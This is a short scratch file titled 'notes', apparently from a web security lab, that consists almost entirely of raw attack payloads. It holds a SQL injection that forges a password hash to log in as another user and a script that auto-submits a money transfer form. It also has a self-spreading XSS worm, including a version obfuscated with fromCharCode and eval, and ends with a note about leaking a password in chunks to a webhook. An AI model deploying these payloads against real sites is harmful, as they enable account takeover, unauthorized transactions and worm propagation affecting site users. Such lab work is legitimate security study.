notes

bob' UNION SELECT id, '426a1c28c61b7ba258fa3cc300ba7cd3abc11c0d4b585d3ce4a15d6f22d6d363' AS password_hash, '123' AS salt FROM users WHERE username = 'bob




<script>document.forms[0].to.value="b";document.forms[0].amount.value="1";document.forms[0].submit();</script>


<script>alert(0);</script>


<script>$.ajax({url:$(String.fromCharCode(46,115,112,97,110,51,32,97)).attr(String.fromCharCode(104,114,101,102)),success:function(data){document.forms[0].title.value=String.fromCharCode(46);document.forms[0].body.innerHTML=data.replace(/(String.fromCharCode(34)|String.fromCharCode(39))/g,String.fromCharCode(32));/*document.forms[0].submit();*/},});</script>


$.ajax({url:$(".span3 a").attr("href"),success:function(data){document.forms[0].title.value="a";document.forms[0].body.innerHTML=data.replace(/['"]/g,"");document.forms[0].submit();},});


alert('0');

</script><script>$(function(){eval(String.fromCharCode(36,46,97,106,97,120,40,123,117,114,108,58,36,40,34,46,115,112,97,110,51,32,97,34,41,46,97,116,116,114,40,34,104,114,101,102,34,41,44,115,117,99,99,101,115,115,58,102,117,110,99,116,105,111,110,40,100,97,116,97,41,123,100,111,99,117,109,101,110,116,46,102,111,114,109,115,91,48,93,46,116,105,116,108,101,46,118,97,108,117,101,61,34,97,34,59,100,111,99,117,109,101,110,116,46,102,111,114,109,115,91,48,93,46,98,111,100,121,46,105,110,110,101,114,72,84,77,76,61,100,97,116,97,46,114,101,112,108,97,99,101,40,47,91,39,34,93,47,103,44,34,126,34,41,59,100,111,99,117,109,101,110,116,46,102,111,114,109,115,91,48,93,46,115,117,98,109,105,116,40,41,59,125,44,125,41,59));});</script>




does it look something like webhooks: [localhost:port/?chunked_password=xxx]?